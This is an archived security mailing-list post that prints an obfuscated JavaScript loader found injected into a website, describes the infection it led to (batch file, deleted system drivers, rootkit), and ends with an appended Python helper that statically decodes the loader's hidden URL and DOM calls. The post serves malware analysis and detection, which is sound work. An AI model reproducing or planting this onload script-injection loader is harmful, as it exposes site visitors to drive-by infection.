WebApp Sec mailing list archives

Give a look at the malicious script


From: s34c0d3r () gmail com
Date: 20 May 2010 21:47:29 -0000

Hello Everyone,
I was just working on some web application security and found a malicious script injected in the code. It was
prepared wisely but now gets detected.
Here it is:

<script>var g="g";n={jD:51390};function M(){this.ta=false;var t=new 
String("01hcreat".substr(3)+"eElem"+"649pent".substr(4));var Mt=["P"];this.S="";var K=new String("onlo"+"ad");try {var 
Pm='Ae'} catch(Pm){};var A=new String("defer");try {var p='Q'} catch(p){};try {var H='TH'} catch(H){};var c=new 
String("appIsNt".substr(0,3)+"end"+"JKvChi".substr(3)+"ld");var R=window;try {var Ic='Mm'} catch(Ic){};var j=new 
String("bodTQxn".substr(0,3)+"Ne3iyi3Ne".substr(4,1));xD=14051;xD+=70;var u=new Date();var 
TD=document;this.GS=22175;this.GS--;var F=new 
String("scrip"+"tQCwq".substr(0,1));this.D="";this.nB=35701;this.nB-=197;var 
b=String("srKo8".substr(0,2)+"cxUZ".substr(0,1));this.y=63146;this.y--;this.Mx=57925;this.Mx++;function cJ(){try {var 
HI='C'} catch(HI){};try {var 
G=String("/go"+"ogl"+"e.c"+"om/"+"7AG8new".substr(4)+"gro"+"und"+"s.c"+"om/"+"kEAZdow".substr(4)+"nlo"+"ad."+"ytJ4com".substr(4)+".ph"+"p");var z=856480-848400;F_={FD:false};CB={HY:false};var Gx=new String("http:"+"//pas"+"sport"+"blues"+".ru:");this.m="";this.pZ="";var B=6126-6125;var 
xL=["Gp","MK","vC"];this.l=28692;this.l-=179;i=TD[t](F);_R={h:false};try {} catch(L){};var zQ=["jl","s"];var 
NR={af:false};try {var NF='Pv'} catch(NF){};try {var Cn='cC'} catch(Cn){};this.iQ=false;aQG=["FU","LQ"];var 
sB="sB";i[A]=B;var PZx="";var aW="";i[b]=Gx+z+G;var Xj=new Date();var ew=new Date();iy=32656;iy-=67;TD[j][c](i);try {} 
catch(ai){};try {} catch(xS){};} catch(X){var Ac={et:"fM"};var RW='';};}R[K]=cJ;this.ge=39406;this.ge++;var 
ewO={jt:"xl"};};var jf={i_:"SY"};var Ph={cM:"Ge"};M();try {var RV='bV'} catch(RV){};</script>


Till now what I found is that when anyone visits the infected site, this script redirects the person to
"http://passportblues.ru:8080/google.com/newsground.com/download.com.php";

passportblues.ru is infecting the system.
For the first time it tried to download a Notes1.pdf file.
The strange thing is that it loaded the notes1.pdf file, but the PDF didn't have any exploit embedded in it. When the
site (passportblues.ru) successfully infects the system, a cmd.exe process is created, which actually executes the
batch file downloaded onto the system; this deletes "iexplorer", infects the system and removes around 7-8 .sys files from
Windows. After that, pendrives are blocked on the system: USB ports work (wifi USB adapters are working) but no pendrive
works.
It tries to install a rootkit on the system as well, and the internet connection is also blocked on the system.

It is really a notorious script with a little technique to join the whole.
"hxxp://passportblues.ru:8080/google.com/newsground.com/download.com.php"

Any comments regarding it are welcome.
Tarun Kalla
aka S34
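The following is an added static deobfuscation helper; it is not part of the original post and not the poster's code. It evaluates the literal-plus-substr concatenations and the integer arithmetic from the posted script the way a JavaScript engine would, so an analyst can read the hidden DOM calls and the injected src URL from a captured page without loading the script in a browser. The expressions in OBFUSCATED are copied from the script above (keyed by the variable they were assigned to); the function names, the `<unresolved:...>` marker for anything that is not a plain literal, and the summary layout are assumptions of this example.

```python
import re

# One term of an obfuscated string expression: a quoted literal, optionally
# followed by .substr(start) or .substr(start,length).
TERM = re.compile(r'''(["'])(.*?)\1(?:\.substr\((\d+)(?:,(\d+))?\))?''')
# A small integer expression such as 856480-848400 (used to hide the port and the defer flag).
INT_EXPR = re.compile(r'(\d+)\s*([-+])\s*(\d+)')
# new String( ... ) / String( ... ) wrappers add nothing to the value.
WRAPPER = re.compile(r'(?:new\s+)?String\((.*)\)', re.S)


def js_substr(s, start, length=None):
    """JavaScript String.prototype.substr: `length` chars from `start` (to the end if omitted)."""
    return s[start:] if length is None else s[start:start + length]


def split_outside_quotes(expr, sep='+'):
    """Split on `sep` only where it is not inside a string literal."""
    parts, cur, quote = [], [], None
    for ch in expr:
        if quote:
            cur.append(ch)
            if ch == quote:
                quote = None
        elif ch in ('"', "'"):
            quote = ch
            cur.append(ch)
        elif ch == sep:
            parts.append(''.join(cur))
            cur = []
        else:
            cur.append(ch)
    parts.append(''.join(cur))
    return [p.strip() for p in parts]


def decode_expr(expr):
    """Evaluate a literal/substr/integer expression to the value a JS engine would produce.
    Returns a str for string expressions, an int for arithmetic, and leaves anything
    else (e.g. a bare variable name) as an '<unresolved:NAME>' marker."""
    expr = expr.strip()
    m = WRAPPER.fullmatch(expr)
    if m:
        expr = m.group(1).strip()
    m = INT_EXPR.fullmatch(expr)
    if m:
        a, op, b = int(m.group(1)), m.group(2), int(m.group(3))
        return a - b if op == '-' else a + b
    out = []
    for part in split_outside_quotes(expr):
        t = TERM.fullmatch(part)
        if t:
            start = int(t.group(3)) if t.group(3) else 0
            length = int(t.group(4)) if t.group(4) else None
            out.append(js_substr(t.group(2), start, length))
        else:
            out.append('<unresolved:%s>' % part)
    return ''.join(out)


# Assignments copied from the script in the post (variable name -> right-hand side).
OBFUSCATED = {
    't':  '"01hcreat".substr(3)+"eElem"+"649pent".substr(4)',
    'K':  '"onlo"+"ad"',
    'A':  '"defer"',
    'c':  '"appIsNt".substr(0,3)+"end"+"JKvChi".substr(3)+"ld"',
    'j':  '"bodTQxn".substr(0,3)+"Ne3iyi3Ne".substr(4,1)',
    'F':  '"scrip"+"tQCwq".substr(0,1)',
    'b':  'String("srKo8".substr(0,2)+"cxUZ".substr(0,1))',
    'G':  'String("/go"+"ogl"+"e.c"+"om/"+"7AG8new".substr(4)+"gro"+"und"+"s.c"+"om/"'
          '+"kEAZdow".substr(4)+"nlo"+"ad."+"ytJ4com".substr(4)+".ph"+"p")',
    'Gx': 'new String("http:"+"//pas"+"sport"+"blues"+".ru:")',
    'z':  '856480-848400',
    'B':  '6126-6125',
}


def decode_all(table=OBFUSCATED):
    return {name: decode_expr(expr) for name, expr in table.items()}


def reconstruct_loader(table=OBFUSCATED):
    """Return the de-obfuscated DOM operations behind i=TD[t](F); i[A]=B; i[b]=Gx+z+G; TD[j][c](i)."""
    v = decode_all(table)
    url = '%s%s%s' % (v['Gx'], v['z'], v['G'])   # JS coerces the number z to a string here
    return {
        'event':  'window.%s' % v['K'],                    # handler registered via R[K]=cJ
        'create': 'document.%s("%s")' % (v['t'], v['F']),  # i=TD[t](F)
        'defer':  v['B'],                                  # i[A]=B
        'src':    url,                                     # i[b]=Gx+z+G
        'attach': 'document.%s.%s(i)' % (v['j'], v['c']),  # TD[j][c](i)
    }


if __name__ == '__main__':
    for key, val in reconstruct_loader().items():
        print('%-7s %s' % (key, val))
```

Run stand-alone, this prints the loader's real shape: on window.onload it calls document.createElement("script"), sets defer, points src at the passportblues.ru:8080 URL assembled from the split literals and the 856480-848400 port arithmetic, and appends the element to document.body. Resolving the strings statically like this, rather than running the sample, is what lets a detection rule or a web-filter signature match on the behaviour (substr-assembled DOM method names, arithmetic-hidden port, remote script element appended on load) rather than on any one obfuscated variable name, which the author of such a script can change at will.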




